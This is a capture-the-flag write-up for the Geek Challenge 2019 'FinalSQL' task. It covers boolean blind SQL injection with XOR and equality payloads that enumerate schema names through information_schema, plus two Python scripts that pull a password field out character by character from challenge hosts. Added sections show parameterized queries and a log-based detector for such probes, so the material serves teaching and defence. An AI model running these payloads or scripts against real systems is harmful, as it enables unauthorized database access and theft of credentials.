
[Geek Challenge 2019] FinalSQL

Date: 2020-02-13 22:02:27

0x00 Key concepts

Blind SQL injection

0x01 Solution

The challenge hint says blind injection, so clicking around a few times is enough to locate the injection point.

We find that entering the ^ operator successfully switches the page that is returned, which proves the injection exists.

"1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))=%d)^1"%(i,ord(j))
Enumerate database names

"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j))
Enumerate table names

"1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
Enumerate column names
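The oracle these payloads rely on exists because search.php splices the id parameter straight into the SQL text. The following is an added example, not the challenge's own search.php (whose source is not on this page): a vulnerable lookup next to a parameter-bound one, over a constructed SQLite fixture. SQLite has no ^ operator, so the demonstration uses the id=1=(cond)=1 form that also appears on this page; the table, rows and function names are assumptions.

```python
import sqlite3

# Constructed fixture standing in for the challenge's database. The real schema
# behind search.php is not shown on this page; only "look a row up by id" is
# modelled, with the page text the challenge shows for id=1 as row 1's title.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(1, "NO! Not this! Click others~~~"), (2, "second post"), (3, "third post")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    """String concatenation: the client-supplied text becomes part of the SQL."""
    row = conn.execute("SELECT title FROM posts WHERE id=" + user_id).fetchone()
    return row[0] if row else None

def lookup_safe(conn, user_id):
    """Parameter binding: the value is sent as data and is never parsed as SQL."""
    row = conn.execute("SELECT title FROM posts WHERE id=?", (user_id,)).fetchone()
    return row[0] if row else None

def lookup_safe_strict(conn, user_id):
    """Binding plus input validation: anything that is not a plain integer is rejected."""
    if not user_id.isdigit():
        return None
    return lookup_safe(conn, int(user_id))

if __name__ == "__main__":
    conn = make_db()
    # With concatenation, `WHERE id=1=(cond)=1` parses as `((id=1)=(cond))=1`:
    # a true condition selects the id=1 row, a false one selects every other row,
    # so the returned page leaks one bit about `cond` per request. Bound as a
    # parameter, the same string is just a value that matches no id.
    for value in ["1", "1=(1)=1", "1=(0)=1"]:
        print(repr(value), "->", lookup_vulnerable(conn, value), "|", lookup_safe(conn, value))
```

The strict variant is the shape to prefer for numeric ids: binding alone already stops the text from being parsed as SQL, but rejecting non-integers also removes the error-message and type-coercion edge cases that the driver would otherwise have to handle.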

Retrieving the flag:

import requests

url = "http://9c13f59b-720e-4c5a-9d63-69342c1be65a.node3.buuoj.cn/search.php"
flag = ""
for i in range(1, 20):                  # character position in the password string
    for j in range(1, 128):             # candidate ASCII code for that position
        # 1^(true)^1 = 1 returns the id=1 row; 1^(false)^1 = 0 returns no row
        d = "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1" % (i, j)
        r = requests.get(url + d)
        if 'Click' in r.text:           # the id=1 page contains the word "Click"
            flag += chr(j)
            print(flag)
            break

Here is another blind-injection script, from a fellow player's write-up:

https://blog.csdn.net/qq_42967398/article/details/102979306

import requests
import io
import sys
import string
import time

sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')       # change the default encoding of standard output, otherwise s.text cannot be printed
'''
url = "http://118.25.14.40:8104/search.php?id=1=(1)=1"
s = requests.get(url)
s.encoding = 'utf-8' 
content = s.content

# check whether the request succeeded
if 'NO! Not this! Click others~~~' in s.text:
    s.encoding = 'gbk' 
    print(s.text)
    

# construct the SQL injection statements
F1naI1y,Flaaaaag
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s
ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s
ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s
'''

url = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)=1"
url2 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%s,1))=%s)=1"
url3 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%s,1))=%s)=1"
url4 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%s,1))=%s)=1"
url5 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(password))from(F1naI1y)),%s,1))=%s)=1"
ss = ""
x = string.printable

for i in range(1,30):
    for j in x:
        payload = url5%(str(i),ord(j))
        #print(payload)
        time.sleep(0.5)
        s = requests.get(payload)
        if 'NO! Not this! Click others~~~' in s.text:
            ss += j
            print(ss)
            break
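Both scripts above have the same footprint from the server's side: one client, one path, hundreds of requests that differ only in a position number and a character code, each carrying an information_schema or ascii(substr(...)) expression in the query string. The following is an added example, not part of either write-up, of detection logic that looks for exactly that footprint in access logs. The log lines are constructed in Apache combined format with documentation-range addresses; the indicator names, thresholds and function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators taken from the payload shapes shown in this write-up.
INDICATORS = {
    "schema_enum": re.compile(r"information_schema\.(schemata|tables|columns)", re.I),
    "char_oracle": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|mid)\s*\(", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "bool_wrap": re.compile(r"[\^=]\s*\(.*\)\s*[\^=]\s*1\s*$", re.I),
}

# Constructed sample: one client probing search.php character by character,
# one client browsing normally.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Feb/2020:22:01:07 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=%27geek%27),1,1))=70)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
    '203.0.113.7 - - [13/Feb/2020:22:01:08 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))=98)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
    '198.51.100.4 - - [13/Feb/2020:22:01:09 +0800] "GET /search.php?id=2 HTTP/1.1" 200 1610 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Feb/2020:22:01:09 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),2,1))=52)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
    '203.0.113.7 - - [13/Feb/2020:22:01:10 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),3,1))=100)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
    '203.0.113.7 - - [13/Feb/2020:22:01:11 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),4,1))=49)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
    '198.51.100.4 - - [13/Feb/2020:22:01:15 +0800] "GET /search.php?id=3 HTTP/1.1" 200 1598 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Feb/2020:22:01:12 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),5,1))=55)%5E1 HTTP/1.1" 200 1532 "-" "python-requests/2.22.0"',
]

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decoded_query_values(target):
    """URL-decode every query-string value of a request target."""
    return [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]

def indicators_for(target):
    """Names of the injection indicators matched by any decoded query value."""
    hits = set()
    for value in decoded_query_values(target):
        for name, rx in INDICATORS.items():
            if rx.search(value):
                hits.add(name)
    return hits

def analyze(lines, min_indicators=2, min_requests=5):
    """Group suspicious requests by (client, path) and flag blind-injection bursts.

    A request is suspicious when it matches at least `min_indicators` indicators.
    A client is flagged when it sends at least `min_requests` suspicious requests
    to one path: a boolean oracle costs one request per guessed character, so the
    volume itself is the signal. Digits are collapsed to build a request template,
    and a burst that differs only in position and guess collapses to one template.
    """
    per_client = defaultdict(lambda: {"requests": 0, "indicators": set(), "templates": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = indicators_for(rec["target"])
        if len(hits) < min_indicators:
            continue
        entry = per_client[(rec["ip"], urlsplit(rec["target"]).path)]
        entry["requests"] += 1
        entry["indicators"] |= hits
        decoded = "&".join(decoded_query_values(rec["target"]))
        entry["templates"].add(re.sub(r"\d+", "N", decoded))
    return {key: e for key, e in per_client.items() if e["requests"] >= min_requests}

if __name__ == "__main__":
    for (ip, path), e in analyze(SAMPLE_LOG).items():
        print(f"{ip} {path}: {e['requests']} probing requests, "
              f"{len(e['templates'])} templates, indicators={sorted(e['indicators'])}")
```

Requiring two indicators keeps a single stray parenthesis or `=1` in a legitimate search term from firing, while the per-client count and the template collapse separate a scripted oracle from a one-off scanner hit; in a real pipeline the same fields (client, path, request count, distinct templates) are what an alert would carry.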

References
http://www.pdsdt.lovepdsdt.com/index.php/2019/11/19/2019_geek_web/#0x20_Finalsql

https://blog.csdn.net/qq_42967398/article/details/102979306


Original post: https://www.cnblogs.com/wangtanzhi/p/12305052.html
